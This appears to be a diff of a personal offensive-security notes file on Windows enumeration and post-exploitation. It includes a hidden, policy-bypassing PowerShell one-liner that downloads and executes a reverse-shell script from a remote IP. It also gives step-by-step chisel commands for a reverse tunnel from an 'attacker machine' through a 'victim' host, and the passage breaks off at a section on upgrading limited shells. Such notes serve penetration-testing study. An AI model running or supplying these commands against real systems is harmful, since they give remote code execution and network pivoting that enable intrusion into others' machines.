grandMa5ter/Cyber-Sec-Notes/offensive/enumeration-windows.md

 There are also some no-so-well documented PowerShell argument shortcuts so can use things like -w rather than -WindowsStyle (handy for smaller payloads):
   `CMD C:\> @"%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noni -nop -i None -ex Bypass -c "iex ((New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/Invoke-PowerShellTcp.ps1'))"`

+## Creating a fast TCP/UDP tunnel transported over HTTP secured via SSH with CHISEL

+Download the appropriate OS binaries from the release folder of the chisel [on here](https://github.com/jpillora/chisel):
+`mv ~/Downloads/chisel_1.7.6_windows_amd64.gz .`

+- Unzip the files with gunzip:
+  - `gunzip -d chisel_1.7.6_windows_amd64.gz` & then make it executable `mv chisel_1.7.6_windows_amd64 chisel.exe`
+  - `gunzip -d chisel_1.7.6_linux_amd64.gz` & then make it executable by `mv chisel_1.7.6_linux_amd64 chisel` & `chmod +x chisel`
+- Then on the attacker machine run the chisel server:
+  `./chisel server --reverse --port 9002`
+- Send the client one to the host/victim machine via curl/curtutil/ftp/netcat or whatever mechanism you have and then execute the following.
+Have that in mind below maps port 3306 to localhost in reverse and also we mapped the second one 8888 just in case.
+  `.\chisel.exe client 10.10.14.23:9002 R:3306:localhost:3306 R:8888:localhost:8888`

 ### Upgrading your Windows Shell

 You might find that you are connected with a limited shell such as a Web shell, netcat shell or Telnet connection that simply is not cutting it for you.
 Here are a few oneliners you can use to upgrade your shell: